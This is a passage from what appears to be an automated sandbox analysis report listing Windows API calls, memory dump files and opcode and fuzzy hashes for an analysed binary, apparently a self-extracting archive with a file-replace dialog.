                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 665ce883b6fce588b7a4b7dae8fb23b11a7d127292ebabbd21093b97d4c10748
                                                                          • Instruction ID: 17c33bbd51e74843e693479c51d341b91006845b5c2aac306e8c388cb159203d
                                                                          • Opcode Fuzzy Hash: 665ce883b6fce588b7a4b7dae8fb23b11a7d127292ebabbd21093b97d4c10748
                                                                          • Instruction Fuzzy Hash: 97B012C22580407C310452081D03D7B150DC5C1F34330802EFC08C0081E8404C863E72
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 94b3ed56a1e27024433ca38879ac2661d5294da00bc5f4c5fc3c4e87351bbee2
                                                                          • Instruction ID: 7dda774a93520ee5e1716dedd924db35a2d0a8176145099e3f1d9149bfd17de7
                                                                          • Opcode Fuzzy Hash: 94b3ed56a1e27024433ca38879ac2661d5294da00bc5f4c5fc3c4e87351bbee2
                                                                          • Instruction Fuzzy Hash: CDA002D6159141BC314455515D06DB7111DD5C5B71734452DFC17D4581585468853971
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 58f4a898b549b964fb18e5943e13656336b4dbb3542522728513a1dafe6a9f3b
                                                                          • Instruction ID: 7614f79e6c509dc433e34df385902a94aeaf53ff8f4a927c861447e78d3208a1
                                                                          • Opcode Fuzzy Hash: 58f4a898b549b964fb18e5943e13656336b4dbb3542522728513a1dafe6a9f3b
                                                                          • Instruction Fuzzy Hash: CDA022C3AAC202BC300822A02C03CBB220EC8C0F30330882EFC0AC00C0BC800CE23CB2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: b502d68fc27cabe9c01d1b6f40c46e99a557052af5b8d22fb78e61ae506ccaec
                                                                          • Instruction ID: 7614f79e6c509dc433e34df385902a94aeaf53ff8f4a927c861447e78d3208a1
                                                                          • Opcode Fuzzy Hash: b502d68fc27cabe9c01d1b6f40c46e99a557052af5b8d22fb78e61ae506ccaec
                                                                          • Instruction Fuzzy Hash: CDA022C3AAC202BC300822A02C03CBB220EC8C0F30330882EFC0AC00C0BC800CE23CB2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 10b1505cff069fe39e9ab8409454efbafd905d3c060340be4c6161cad563ded5
                                                                          • Instruction ID: 94b2680aeb1df7fdeb48da9044df6024fec2d7401e8c8441d6b112c77a139b3d
                                                                          • Opcode Fuzzy Hash: 10b1505cff069fe39e9ab8409454efbafd905d3c060340be4c6161cad563ded5
                                                                          • Instruction Fuzzy Hash: 58A011C2AA82003C300822A02C03CBB220EC8C0B32330822EFC08E0080A88008A238B2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: deb0add08889d7659315ee9eb71ac31b46c4eff6b54ca66e6e839f312ad437de
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: deb0add08889d7659315ee9eb71ac31b46c4eff6b54ca66e6e839f312ad437de
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 6591b5d9840b6ca80c35a155d6806d207e6be2ff96ebd8c06c1ddf3f92b3b21d
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 6591b5d9840b6ca80c35a155d6806d207e6be2ff96ebd8c06c1ddf3f92b3b21d
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 3739ac6a446bdce72e3d0850967148100a13352fc358b4d01d5d5062fbbc8e5b
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 3739ac6a446bdce72e3d0850967148100a13352fc358b4d01d5d5062fbbc8e5b
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 63336934f71c24e31aff5f7219864f35f96d7540743fe639fa0bd19b7908c0ce
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 63336934f71c24e31aff5f7219864f35f96d7540743fe639fa0bd19b7908c0ce
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          APIs
                                                                          • SetEndOfFile.KERNELBASE(?,00F0903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00F09F0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File
                                                                          • String ID:
                                                                          • API String ID: 749574446-0
                                                                          • Opcode ID: 7d36df185911fe0458a3b504954e47db89136dadc1128225dd9b3270994982cb
                                                                          • Instruction ID: 2308fcd362e8c3188aa15af6e5a7046564afd1462b0a675029248e9cf4f5b490
                                                                          • Opcode Fuzzy Hash: 7d36df185911fe0458a3b504954e47db89136dadc1128225dd9b3270994982cb
                                                                          • Instruction Fuzzy Hash: 33A0223008800E8BEE002B30CF0800C3B22FB20BC830002E8A00BCF0B2CB2B880BEB00
                                                                          APIs
                                                                          • SetCurrentDirectoryW.KERNELBASE(?,00F1AE72,C:\Users\user\Desktop,00000000,00F4946A,00000006), ref: 00F1AC08
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: 88a3227593674f28574d0a8167ad8560e3a36672346b92ea41f91b66585af3b2
                                                                          • Instruction ID: be847fa6166e5e6cb0bc869aa25ce910928724b05acf163bbdc9e24f6d46554c
                                                                          • Opcode Fuzzy Hash: 88a3227593674f28574d0a8167ad8560e3a36672346b92ea41f91b66585af3b2
                                                                          • Instruction Fuzzy Hash: 1AA011302002008B8200AB328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820BA00
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,00F095D6,?,?,?,?,?,00F32641,000000FF), ref: 00F0963B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: d7c7a760468ed1c372e47ee285b793e4011d9ce68ce4aaab7d2ad88ff61e5509
                                                                          • Instruction ID: f77b057d48875259b5467cff5481513914c271901a35a6dbfaa454d6f5347a1a
                                                                          • Opcode Fuzzy Hash: d7c7a760468ed1c372e47ee285b793e4011d9ce68ce4aaab7d2ad88ff61e5509
                                                                          • Instruction Fuzzy Hash: 05F0E9708C5B059FDB308A64C44879277E86B12331F040B1ED0F2429E1E3B2658DBA40
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F1C2B1
                                                                          • EndDialog.USER32(?,00000006), ref: 00F1C2C4
                                                                          • GetDlgItem.USER32(?,0000006C), ref: 00F1C2E0
                                                                          • SetFocus.USER32(00000000), ref: 00F1C2E7
                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F1C321
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F1C358
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00F1C36E
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F1C38C
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1C39C
                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1C3B8
                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1C3D4
                                                                          • _swprintf.LIBCMT ref: 00F1C404
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F1C417
                                                                          • FindClose.KERNEL32(00000000), ref: 00F1C41E
                                                                          • _swprintf.LIBCMT ref: 00F1C477
                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F1C48A
                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F1C4A7
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F1C4C7
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1C4D7
                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1C4F1
                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1C509
                                                                          • _swprintf.LIBCMT ref: 00F1C535
                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F1C548
                                                                          • _swprintf.LIBCMT ref: 00F1C59C
                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F1C5AF
                                                                            • Part of subcall function 00F1AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1AF35
                                                                            • Part of subcall function 00F1AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E72C,?,?), ref: 00F1AF84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                          • API String ID: 797121971-1840816070
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F06FAA
                                                                          • _wcslen.LIBCMT ref: 00F07013
                                                                          • _wcslen.LIBCMT ref: 00F07084
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                            • Part of subcall function 00F0A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641,000000FF), ref: 00F0A1F1
                                                                            • Part of subcall function 00F0A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641), ref: 00F0A21F
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00F07139
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F07155
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F07298
                                                                            • Part of subcall function 00F09DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F073BC,?,?,?,00000000), ref: 00F09DBC
                                                                            • Part of subcall function 00F09DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E70
                                                                            • Part of subcall function 00F09620: CloseHandle.KERNELBASE(000000FF,?,?,00F095D6,?,?,?,?,?,00F32641,000000FF), ref: 00F0963B
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Strings
                                                                          Similarity
